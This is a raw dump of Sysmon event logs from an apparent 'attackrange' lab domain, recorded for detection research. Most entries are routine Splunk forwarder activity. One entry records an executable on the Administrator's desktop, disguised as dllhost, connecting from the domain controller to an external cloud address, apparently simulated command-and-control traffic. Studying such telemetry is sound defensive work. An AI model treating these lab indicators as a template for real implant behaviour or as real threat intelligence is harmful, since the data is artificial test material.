19:17:27.468{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094904Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:28.617{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA1D00F63593666DA2B16D76057BD271,SHA256=355BDA3C30C39805A4546EDA8A1D63243B5AB8D37C2C2D5953B3E0124178858A,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001605605Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:28.144{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605604Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:28.144{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F0AAB6ADE08BE0E4A572EF358730CC6,SHA256=C428C4293B9B50FED1FEE60C13EB7415D583E97B27F2BE955B1EE5960653FA8Afalsefalse - insufficient disk space 
10341000x80000000000000001094903Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:28.469{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094902Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:28.469{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094909Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:29.627{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48D43A0C11FB6B72C0857A44F6BC1D7A,SHA256=1D575A05D21C9C32F159E18AABBFF156B26DEEDD4AA338F88721ED529E35F2A1,IMPHASH=00000000000000000000000000000000falsetrue 
734700x80000000000000001605773Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001605772Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001605771Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001605770Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001605769Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001605768Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001605767Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001605766Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001605765Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001605764Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001605763Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001605762Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001605761Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001605760Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001605759Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft 
Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001605758Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001605757Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001605756Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001605755Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program 
Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001605754Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001605753Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001605752Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001605751Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime 
LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001605750Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001605749Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001605748Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001605747Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 
librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001605746Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 10341000x80000000000000001605745Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001605744Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001605743Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001605742Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001605741Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241trueSplunk, Inc.Valid 10341000x80000000000000001605740Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-83AC-607D-0500-00000000BB01}412528C:\Windows\system32\csrss.exe{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001605739Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-842A-607D-9700-00000000BB01}37163760C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001605738Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.718{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001605737Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:31.718{21761711-842A-607D-9700-00000000BB01}3716<Anonymous 
Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605736Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:31.718{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001605735Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:31.718{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605734Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:31.718{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001605733Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:31.718{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605732Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:31.718{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x80000000000000001605731Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.433{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605730Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.433{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8986CB99929EE32BEA3B7E28EC6B1800,SHA256=35F450EFE46D1B8F9A15E6E8140FF1C1BB57CCEBB318455A0BA3DA261018E570falsefalse - insufficient disk space 354300x80000000000000001094916Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:25.520{761B69BB-65B6-6080-265D-00000000BA01}2304C:\Users\Administrator\Desktop\64_dllhost.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-982.attackrange.local1135-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 10341000x80000000000000001094915Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 